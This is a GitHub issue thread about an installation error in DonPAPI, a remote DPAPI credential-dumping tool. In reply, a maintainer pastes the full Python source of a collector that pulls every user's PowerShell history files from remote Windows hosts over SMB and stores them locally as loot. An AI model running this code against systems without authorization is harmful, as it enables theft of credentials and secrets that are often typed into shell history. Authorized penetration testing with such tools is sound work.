search

login-securite / DonPAPI

Dumping DPAPI credz remotely
GNU General Public License v3.0
962 stars 114 forks source link

No module named 'donpapi.collectors.powershellhistory' #95

Open QU35T-code opened 2 days ago

QU35T-code commented 2 days ago

Hello, since the last release there is a problem with the installation of donpapi.

pipx install --system-site-packages git+https://github.com/login-securite/DonPAPI

Run docker exec exegol-PR403-amd64 cat /.exegol/build_pipeline_tests/failed_commands.log
COMMAND: DonPAPI --help
└── STDOUT:
Your version of Exegol wrapper is not up-to-date!

└── STDERR:
Traceback (most recent call last):
  File "/root/.local/bin/DonPAPI", line 5, in <module>
    from donpapi.entry import main
  File "/root/.local/share/pipx/venvs/donpapi/lib/python3.11/site-packages/donpapi/entry.py", line 44, in <module>
    from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag
ModuleNotFoundError: No module named 'donpapi.collectors.powershellhistory'
Dfte commented 1 day ago

Yup that's my bad, sorry about that. What you can do is add the powershellhistory.py file in donpapi/collectors with the following content:

import os
import ntpath
from typing import Any
from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection
from donpapi.core import DonPAPICore
from donpapi.lib.logger import DonPAPIAdapter

TAG = "PowerShellHistory"

class PowerShellHistoryDump:
    false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
    user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"]
    max_filesize = 5000000

    def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
        self.target = target
        self.conn = conn
        self.masterkeys = masterkeys
        self.options = options
        self.logger = logger
        self.context = context
        self.found = 0

    def run(self):

        self.logger.display("Gathering powershell history files")
        for user in self.context.users:
            for directory in self.user_directories:
                directory_path = directory.format(username=user)
                self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
        self.logger.secret(f"Found {self.found} powershell history files", TAG)

    def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
        directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
        if directory_list is not None:
            for item in directory_list:
                if item.get_longname() not in self.false_positive:
                    self.found += 1
                    new_path = ntpath.join(directory_path, item.get_longname())
                    file_content = self.conn.readFile(self.context.share, new_path)
                    local_filepath = os.path.join(self.context.output_dir, *(new_path.split('\\')))
                    # Stores the file in loot\TARGET\Users\{username}\AppData\
                    os.makedirs(os.path.dirname(local_filepath), exist_ok=True)
                    with open(local_filepath, "wb") as f:
                        if file_content is None:
                            file_content = b""
                        f.write(file_content)

                    # Stores files in loot\PowerShellHistory
                    os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
                    local_filepath = os.path.join(
                        f"{self.context.output_dir}/../PowerShellHistory", 
                        f"{item.get_longname()}-{self.found}"
                    )
                    with open(local_filepath, "wb") as f:
                        if file_content is None:
                            file_content = b""
                        f.write(file_content)

Sorry I fucked up the last PR :/

QU35T-code commented 1 day ago

Do you think there will be a fix release soon or do I have to quick fix the tool installation ?

Dfte commented 1 day ago

Yeah it should be fixed soon. That said, there is nothing to fix in the tool installation. Juste add the file I mentioned, the one that I pushed in that PR https://github.com/login-securite/DonPAPI/pull/80 which I also erased by mistake in that PR https://github.com/login-securite/DonPAPI/pull/81/commits/9947dae00a7eb98fd176810cac143cef90678b5d

Dfte commented 23 hours ago

https://github.com/login-securite/DonPAPI/pull/96 :P